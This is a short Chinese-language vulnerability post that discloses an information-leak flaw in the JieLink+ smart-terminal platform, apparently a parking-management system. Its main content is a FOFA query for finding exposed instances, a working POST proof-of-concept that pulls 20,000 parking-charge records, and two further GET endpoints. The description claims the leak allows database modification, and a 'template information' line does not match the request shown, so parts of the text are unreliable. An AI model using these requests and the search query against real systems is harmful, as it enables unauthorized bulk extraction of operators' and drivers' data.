正文

JieLink+智能终端操作平台 GetDataList 敏感信息泄露漏洞

admin
admin V管理员 /0 评论 /20 阅读
0616
文章最后更新时间2025年06月16日,若文章内容或图片失效,请留言反馈!

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述:

JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。

影响版本:

JieLink+智能终端操作平台

FOFA:

title="JieLink+智能终端操作平台"

POC:

POST /report/ParkChargeRecord/GetDataList HTTP/1.1HostAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 17page=1&rows=20000
成功获取模板信息
还有两个利用点如下:
POC1-POC2
GET /Report/ParkCommon/GetParkInThroughDeivces HTTP/1.1Host:
GET /report/ParkOutRecord/GetDataList HTTP/1.1Host:

--------

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
周飒博客-ZhouSa.com